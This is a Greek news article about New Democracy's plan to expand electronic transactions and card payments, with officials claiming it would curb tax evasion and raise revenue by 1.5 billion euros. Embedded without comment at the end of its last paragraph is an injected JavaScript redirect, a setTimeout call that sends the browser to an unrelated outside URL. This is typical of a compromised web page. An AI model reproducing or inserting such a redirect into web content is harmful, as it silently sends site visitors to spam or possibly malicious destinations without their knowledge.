Το τρίπτυχο της ΝΔ για τις ηλεκτρονικές συναλλαγές

0
9

 

Σε ένα τρίπτυχο βασίζεται το σχέδιο της ΝΔ για την προώθηση των ηλεκτρονικών συναλλαγών και την αύξηση του πλαστικού χρήματος, όπως το παρουσίασαν σήμερα ο αντιπρόεδρος του κόμματος, Κωστής Χατζηδάκης, ο συντονιστής Οικονομικών, Χρήστος Σταϊκούρας και ο υπεύθυνος Φορολογικής Πολιτικής, Απόστολος Βεζυρόπουλος.

Όπως ανέφερε ο διευθυντής του γραφείου Τύπου του κόμματος, Μακάριος Λαζαρίδης, η προώθηση των ηλεκτρονικών συναλλαγών αποτελεί τμήμα του οδικού χάρτη για την έξοδο από την κρίση και της «Συμφωνίας Αλήθειας», που παρουσίασε ο πρόεδρος, Κυριάκος Μητσοτάκης, στη ΔΕΘ, ενώ το τρίπτυχο στο οποίο βασίζεται αναλύεται σε λιγότερους φόρους, μικρότερες δαπάνες, αποτελεσματικότερο κράτος.

Για το κράτος και την οικονομία, το όφελος θα είναι η πατάταξη της φοροδιαφυγής και της εισφοροδιαφυγής.

Για τις επιχειρήσεις, το όφελος θα είναι ότι θα εκσυγχρονιστούν και θα γίνουν πιο ανταγωνιστικές. Για τους πολίτες, θα διευκολυνθούν οι συναλλαγές τους και θα μειωθεί το βάρος των έντιμων φορολογουμένων. Έχει υπολογιστεί ότι με την επέκταση των ηλεκτονικών συναλλαγών μπορούν να αυξήσουν τα φορολογικά κατά 1,5 δισ. ευρώ σε ενάμισι χρόνο», είπε ο κ. Κ. Χατζηδάκης.

Όπως τόνισε, το σχέδιο για τις ηλεκτρονικές συναλλαγές μπορεί να είναι δυσάρεστο για τους φοροφυγάδες, όμως θα είναι χρήσιμο για τους έντιμους φορολογουμένους και για το κράτος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here